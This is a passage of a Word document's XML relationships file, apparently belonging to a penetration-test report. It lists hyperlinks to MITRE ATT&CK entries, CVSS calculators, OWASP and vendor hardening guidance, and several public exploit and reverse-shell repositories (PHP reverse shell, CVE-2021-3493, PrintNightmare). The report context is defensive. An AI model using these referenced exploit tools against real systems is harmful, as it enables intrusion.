Target="https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/" TargetMode="External" Id="Rd054d49c6e7a49f7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R49688eee09c642d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/003/" TargetMode="External" Id="Rd48cd0e0a93a49c8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002/" TargetMode="External" Id="R3f1f8fb84eeb4f9a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R441b0b22dd9f427b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050/" TargetMode="External" Id="R3d75810a74ed4d1b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell" TargetMode="External" Id="Rc835b4dd843843cf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External" Id="R6af916204e304782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall" TargetMode="External" Id="Rcaa8bbe924c446ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rd5d77f687c354363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R91be29551b61447f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="R3d3043b099714c21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038/" TargetMode="External" Id="R6df9a61a60314d9e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="Rb09941102ddd41e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" TargetMode="External" Id="R818b21f86bd140d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html" TargetMode="External" Id="Rad7f24071d844198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall" TargetMode="External" Id="R3aa9154924224880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R6b81cbdf922b4787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="Rda2925d82eb1438e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="R2a86aee9eb97426d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038/" TargetMode="External" Id="R0411f4cdb44a41ea" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R398a06ff53f9464f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.4/en/privileges-provided.html" TargetMode="External" Id="Rcf12a86652bc4df3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R93dae00836c349b5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External" Id="R542c7f00c4aa4f98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026/" TargetMode="External" Id="R5e66c8323ab44b5c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018/" TargetMode="External" Id="R9b021a3c88774030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/cybersecurity-101/identity-protection/principle-of-least-privilege-polp/" TargetMode="External" Id="Rbeb5997247d7414c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-137a" TargetMode="External" Id="R3f0e11eb6bc94b55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R2cf3138a87c74dbd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068/" TargetMode="External" Id="Re7cb06448ce84903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External" Id="Rcb0feb396d944273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/briskets/CVE-2021-3493" TargetMode="External" Id="Rbe3fe0125b3349d3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2023-0386" TargetMode="External" Id="R042a735d0bac4bb9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability" TargetMode="External" Id="R4186bd5dae9744db" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R3fe43913e9354b03" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External" Id="R1e6d7ee0366f4003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="Rb056c9abd85c4d91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026/" TargetMode="External" Id="R19ed68aca225488e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R9b7f794501134890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068/" TargetMode="External" Id="R0fcaecd3ef2d475a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External" Id="R46303a2d239841f6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/calebstewart/CVE-2021-1675" TargetMode="External" Id="R1288bdc769d54002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/alerts/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability" TargetMode="External" Id="Rfcd44a894e9948e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/topic/july-6-2021-kb5004945-os-builds-19041-1083-19042-1083-and-19043-1083-out-of-band-44b34928-0a71-4473-aa22-ecf3b83eed0e" TargetMode="External" Id="R845578bbd79842f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Ra2cffe04b3354ef9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/004/" TargetMode="External" Id="Rda6f37875f174b85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022/" TargetMode="External" Id="R746fa835fb3d4004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047/" TargetMode="External" Id="R22e356bc8e6048f9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/pubs/sp/800/57/pt1/r5/final" TargetMode="External" Id="Rd5d7741e1a164ded" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssh.com/academy/compliance/nist-800-53" TargetMode="External" Id="Raa0cf1d12fce44ce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R9377f9c6844642d1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189/" TargetMode="External" Id="Re291f4bbda4a476f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007/" TargetMode="External" Id="Raa07d03b96e242bb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1539/" TargetMode="External" Id="Rec3d344337cc4737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021/" TargetMode="External" Id="R3f0d1e00b9c14df2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0818/" TargetMode="External" Id="R8e96246d28914d29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/Cookies" TargetMode="External" Id="R33ff0c2e236e4bee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/preventing" TargetMode="External" Id="Rcb2dad3636b74ac6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R434496b3c23c4f8f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="R8974cda6fa8c453f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/" TargetMode="External" Id="Raa85626f59044097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="Rad212c74d5884bae" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0818/" TargetMode="External" Id="R31e0b4c0a006481d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection" TargetMode="External" Id="R11d70dd5def34a95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External" Id="Re183ad76c54042e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Reecd9f919e224a0c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/" TargetMode="External" Id="R13e686de6cf0409f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038/" TargetMode="External" Id="R6845f13842b34c28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver17" TargetMode="External" Id="R4aa67cb865c642a8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R7a06677640514fa1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001/" TargetMode="External" Id="Rce427243b5b34c8c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External" Id="Ra0e55c2c84234832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="R47e2b5e9117a481a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cerberusftp.com/blog/eight-essential-tips-for-securing-an-ftp-or-sftp-server/" TargetMode="External" Id="R1c1917834e284116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://phoenixnap.com/kb/configure-firewall-with-ufw-on-ubuntu" TargetMode="External" Id="R6ace8bd009f04f41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R4115b8daead74e73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/002/" TargetMode="External" Id="R6622259cdc9d4612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1052/" TargetMode="External" Id="R3b4376fddb3d4102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/" TargetMode="External" Id="Ra4e69074d6d9415d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rcfa5acafb8fd40cb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003/" TargetMode="External" Id="R719959058c404339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External" Id="R24717ba4e7d14271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External" Id="Rbc230ad535fa4479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External" Id="Rb96934186c2b4342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_basic_system_settings/managing-sudo-access_configuring-basic-system-settings" TargetMode="External" Id="R57764d22eb7f46ff" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/cybersecurity-101/identity-protection/principle-of-least-privilege-polp/" TargetMode="External" Id="R0746149185554d4e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rc58397aaba374ff7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/002/" TargetMode="External" Id="Rc2df3c067b1947e6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001/" TargetMode="External" Id="R2de6674271aa4a82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037/" TargetMode="External" Id="R249f96405ab84d65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042/" TargetMode="External" Id="R027bc2fcbb924bee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/blog/filecab/configure-smb-signing-with-confidence/2418102" TargetMode="External" Id="R121b647e27334b53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R241fec462ed34a97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T0842/" TargetMode="External" Id="Re10da6e3ea2d4915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M0808/" TargetMode="External" Id="R205138fda9544e3b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-mobile-top-10/2014-risks/m3-insufficient-transport-layer-protection" TargetMode="External" Id="R20cd8cab6d6d4099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="Rf3dc05eaceac40f1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037/" TargetMode="External" Id="R100b1c5df41a4688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050/" TargetMode="External" Id="Ree9c5467a95e497c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall" TargetMode="External" Id="Rea579dae359b47a0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/en-us/iaas/Content/WAF/Policies/waf-policy_management.htm" TargetMode="External" Id="R73dce517a5b74abe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210/" TargetMode="External" Id="R7a978b74634a4a91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030/" TargetMode="External" Id="R9638a6a2b9424a46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nordlayer.com/learn/network-security/network-segmentation-best-practices/" TargetMode="External" Id="Rc2bce7bec04f4936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/en_us/blog/learn/network-segmentation.html" TargetMode="External" Id="Rea4a5239df4a4889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R14ff5634b443479a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/" TargetMode="External" Id="Rfc5d64e518b94b92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External" Id="R1b2b531d632141fc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="R52634a9b49e64db4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="R17cbe33c30cb4b5e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R54496870144a49bf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R4ce5d9d1ebb845a5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R87f41b38b822401b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="Rc7bf49b666ec4414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://help.openai.com/en/articles/5112595-best-practices-for-api-key-safety" TargetMode="External" Id="Rc22971dfbb9c4c7b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R6cd3aa531fe74922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003/" TargetMode="External" Id="R0a69fc8e84da4a6c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External" Id="R42383ce61aca41ce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External" Id="R12c85bee667d4af8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/" TargetMode="External" Id="Rc286085b6de84b2e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R4af9037c510242ad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/" TargetMode="External" Id="R9f8377a2fa2d4b26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/" TargetMode="External" Id="Re4b58c4a232c4983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005/" TargetMode="External" Id="Rdaa6b47644f94a48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041/" TargetMode="External" Id="R452816854bb940e7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html" TargetMode="External" Id="Ra2a83d02f22046c8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsec.news/what-are-password-salting-and-password-peppering/" TargetMode="External" Id="R338ff623b10741d6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R1b5e3386d27e4d67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="Rca94cfbc56f14ae6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="Rf09267a6b1f448ea" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042/" TargetMode="External" Id="R4cadabd3618c4378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.inmotionhosting.com/support/edu/wordpress/disable-the-wp-cron/" TargetMode="External" Id="Rbb08847983364727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rb72f5c2a441c4d2c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R5bde9d35f9e6480a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035/" TargetMode="External" Id="R0b15795557694ead" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R3237afdb4a7d4bb0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/" TargetMode="External" Id="R2afc84771dab44aa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/ssrf" TargetMode="External" Id="R38e5090220ba42f7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Re05153af25534135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611/" TargetMode="External" Id="Rffb1816ced13461d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026/" TargetMode="External" Id="Rd1472409a43d4484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R2d850871705e4e89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/" TargetMode="External" Id="R63de1fc3737146d0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rdae2b535a51e4189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003/" TargetMode="External" Id="R9a5441bedc444005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="R821ca5af898d4645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032/" TargetMode="External" Id="R9a9a1966bdda499d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="R461890adf7734532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linode.com/docs/guides/how-to-use-fail2ban-for-ssh-brute-force-protection/" TargetMode="External" Id="Rff44d8b81a094867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="Re477e2d26a6c4ce7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R0a92a959ee4a4e62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003/" TargetMode="External" Id="Rabf208e84c254c1d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1036/" TargetMode="External" Id="Rf6041b2eccac4386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032/" TargetMode="External" Id="R3004c5196c9f4c5f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="R875ff380e2314ced" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="R34a8dafd93d0446a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 